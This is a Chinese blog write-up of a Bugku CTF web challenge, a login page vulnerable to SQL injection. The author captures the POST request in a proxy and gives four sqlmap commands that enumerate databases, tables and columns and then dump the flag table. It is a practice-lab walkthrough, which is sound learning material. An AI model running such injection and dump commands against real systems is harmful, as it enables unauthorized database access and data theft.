• bugku_web_这是一个神奇的登录界面


    首先,通过这个URL:http://120.24.86.145:9001/sql/

    和这个风骚的界面,很明显的SQL注入题目

    然后打开源代码看看:

    action居然没有目标脚本???

    这基本上可以验证就是使用sql注入了

    既然是sql注入,那就要用到注入神器sqlmap了!

    不过,因为这是post方法,所以我们只能使用-r + 请求头的方式

      接下来是保存请求头

      首先打开火狐代理:

      

      //无关紧要的小技巧:最好在输入框里输入好用户名和密码之后再点提交

      

      //无关紧要的注意点:一定要把里面的内容全选(Ctrl+A)再copy to file

      我又把保存好的文件拖到了kali攻击机上,路径是:/zzz/1.txt

    接下来素质四连它:

    //以下命令在kali 2.0中运行正常

    1、sqlmap -r "/zzz/1.txt" -p admin_name --dbs

    -r + 路径是以只读方式打开 -p + admin_name是选取admin_name为注入点(injection point) --dbs是爆破数据库名

    2、sqlmap -r "/zzz/1.txt" -D bugkusql1 -p admin_name --tables

    --tables 是爆列表名

    3、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns

    --columns是爆列名

    4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

    --dump是爆字段

    ??我不明白的是,为什么爆字段的时候,不需要输入y/n而是不停的回车就行了呢?这两种操作究竟有什么不同呢?

    最后得到flag

  • 相关阅读:
    exercise 1-6
    第五章 Inheritance继承
    wk1&2 字符串
    <转>Python 多线程的单cpu与cpu上的多线程的区别
    Python字典增删操作技巧简述
    Python 拷贝对象(深拷贝deepcopy与浅拷贝copy)
    <转>Python3.x和Python2.x的区别介绍
    <转>Python运行的17个时新手常见错误小结
    常见测试流程
    <转>数据库设计的三大范式
  • 原文地址:https://www.cnblogs.com/huangming-zzz/p/9726906.html
Copyright © 2020-2023  润新知